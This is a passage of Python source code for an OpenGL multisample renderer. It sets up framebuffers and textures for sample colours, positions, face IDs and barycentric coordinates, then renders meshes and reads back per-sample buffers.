whitePixel = np.ones([1,1,3])
self.whitePixelTextureID = GL.GLuint(0)
GL.glGenTextures( 1, self.whitePixelTextureID )
GL.glBindTexture(GL.GL_TEXTURE_2D, self.whitePixelTextureID)
image = np.array(np.flipud((whitePixel)), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
self.fbo_ms_errors = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_ms_errors)
self.texture_errors_render = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RGB8, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
self.texture_errors_sample_position = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
self.texture_errors_sample_faces = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_R32UI, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces, 0)
#
self.texture_errors_sample_barycentric1 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1, 0)
self.texture_errors_sample_barycentric2 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2, 0)
self.z_buf_ms_errors = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors, 0)
# self.z_buf_ms_errors = GL.glGenRenderbuffers(1)
# GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
# GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
# GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.fbo_sample_fetch = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_sample_fetch)
self.render_buffer_fetch_sample_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
self.render_buffer_fetch_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
self.render_buffer_fetch_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
#
self.render_buffer_fetch_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
self.render_buffer_fetch_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
self.z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#FBO_f
self.fbo_errors_nonms = GL.glGenFramebuffers(1)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_errors_nonms)
render_buf_errors_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, render_buf_errors_render)
render_buf_errors_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
render_buf_errors_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
#
render_buf_errors_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
render_buf_errors_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
#
z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.textureObjLoc = GL.glGetUniformLocation(self.errorTextureProgram, "myTextureSampler")
#Add background cube:
position_location = GL.glGetAttribLocation(self.errorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.errorTextureProgram, 'colorIn')
uvs_location = GL.glGetAttribLocation(self.errorTextureProgram, 'vertexUV')
face_ids_location = GL.glGetAttribLocation(self.errorTextureProgram, 'face_id')
barycentric_location = GL.glGetAttribLocation(self.errorTextureProgram, 'barycentric')
# self.vbo_verts_cube= vbo.VBO(np.array(self.v_bgCube).astype(np.float32))
# self.vbo_colors_cube= vbo.VBO(np.array(self.vc_bgCube).astype(np.float32))
# self.vbo_uvs_cube = vbo.VBO(np.array(self.ft_bgCube).astype(np.float32))
# self.vao_bgCube = GL.GLuint(0)
# GL.glGenVertexArrays(1, self.vao_bgCube)
#
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube = vbo.VBO(np.array(self.f_bgCube).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
# self.vbo_f_bgCube.bind()
# self.vbo_verts_cube.bind()
# GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_colors_cube.bind()
# GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_uvs_cube.bind()
# GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#
# f = self.f_bgCube
# fc = np.tile(np.arange(len(self.f), len(self.f) + len(f))[:, None], [1, 3]).ravel()
# # fc[:, 0] = fc[:, 0] & 255
# # fc[:, 1] = (fc[:, 1] >> 8) & 255
# # fc[:, 2] = (fc[:, 2] >> 16) & 255
# fc = np.asarray(fc, dtype=np.uint32)
# vbo_face_ids_cube = vbo.VBO(fc)
# vbo_face_ids_cube.bind()
# GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
# GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
#
# #Barycentric cube:
# f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
# vbo_barycentric_cube = vbo.VBO(f_barycentric)
# vbo_barycentric_cube.bind()
# GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_quad = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_quad)
GL.glBindVertexArray(self.vao_quad)
#Bind VAO
self.vbo_face_ids_list = []
self.vbo_barycentric_list = []
self.vao_errors_mesh_list = []
flen = 1
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_face_ids_mesh = []
vbo_barycentric_mesh = []
for polygons in np.arange(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_f.bind()
vbo_verts = self.vbo_verts_mesh[mesh][polygons]
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors = self.vbo_colors_mesh[mesh][polygons]
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_uvs = self.vbo_uvs_mesh[mesh][polygons]
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
f = self.f_list[mesh][polygons]
fc = np.tile(np.arange(flen, flen + len(f))[:,None], [1,3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
vbo_face_ids = vbo.VBO(fc)
vbo_face_ids.bind()
GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
vbo_barycentric = vbo.VBO(f_barycentric)
vbo_barycentric.bind()
GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
flen += len(f)
vaos_mesh += [vao]
vbo_face_ids_mesh += [vbo_face_ids]
vbo_barycentric_mesh += [vbo_face_ids]
GL.glBindVertexArray(0)
self.vbo_face_ids_list += [vbo_face_ids_mesh]
self.vbo_barycentric_list += [vbo_barycentric_mesh]
self.vao_errors_mesh_list += [vaos_mesh]
def render_image_buffers(self):
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
self.makeCurrentContext()
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
GL.glUseProgram(self.errorTextureProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3, GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
# GL.glClearBufferiv(GL.GL_COLOR, 0, 0)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
wwLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_errors_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
# vbo_color.bind()
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
assert(primtype == GL.GL_TRIANGLES)
# GL.glUseProgram(self.errorTextureProgram)
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
else:
texture = self.whitePixelTextureID
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureObjLoc, 0)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f)*vbo_f.data.shape[1])
# # #Background cube:
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube.bind()
# texture = self.whitePixelTextureID
# self.vbo_uvs_cube.bind()
#
# GL.glActiveTexture(GL.GL_TEXTURE0)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# GL.glUniform1i(self.textureObjLoc, 0)
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube)*self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
# self.draw_visibility_image_ms(self.v, self.f)
# GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# # result_blit = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# result_blit2 = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# result_blit_pos = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
GL.glUseProgram(self.fetchSamplesProgram)
# GL.glDisable(GL.GL_MULTISAMPLE)
self.colorsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "colors")
self.sample_positionsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_positions")
self.sample_facesLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_faces")
self.sample_barycentric1Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords1")
self.sample_barycentric2Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords2")
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glActiveTexture(GL.GL_TEXTURE2)
# GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_face)
# GL.glUniform1i(self.sample_facesLoc, 2)
wwLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
self.renders = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'],3])
self.renders_sample_pos = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'],2])
self.renders_faces = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height']]).astype(np.uint32)
self.renders_sample_barycentric1 = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 2])
self.renders_sample_barycentric2 = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'],1])
self.renders_sample_barycentric = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'],3])
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_sample_fetch)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3,
GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
for sample in np.arange(self.nsamples):
sampleLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'sample')
GL.glUniform1i(sampleLoc, sample)
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glUniform1i(self.colorsLoc, 0)
GL.glActiveTexture(GL.GL_TEXTURE1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glUniform1i(self.sample_positionsLoc, 1)
GL.glActiveTexture(GL.GL_TEXTURE2)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glUniform1i(self.sample_facesLoc, 2)
GL.glActiveTexture(GL.GL_TEXTURE3)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glUniform1i(self.sample_barycentric1Loc, 3)
GL.glActiveTexture(GL.GL_TEXTURE4)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glUniform1i(self.sample_barycentric2Loc, 4)
GL.glBindVertexArray(self.vao_quad)
GL.glDrawArrays(GL.GL_POINTS, 0, 1)
# GL.glBindVertexArray(self.vao_bgCube)
# # self.vbo_f_bgCube.bind()
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube) * self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_sample_fetch)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
self.renders[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:2].astype(np.float64))
self.renders_sample_pos[sample] = result
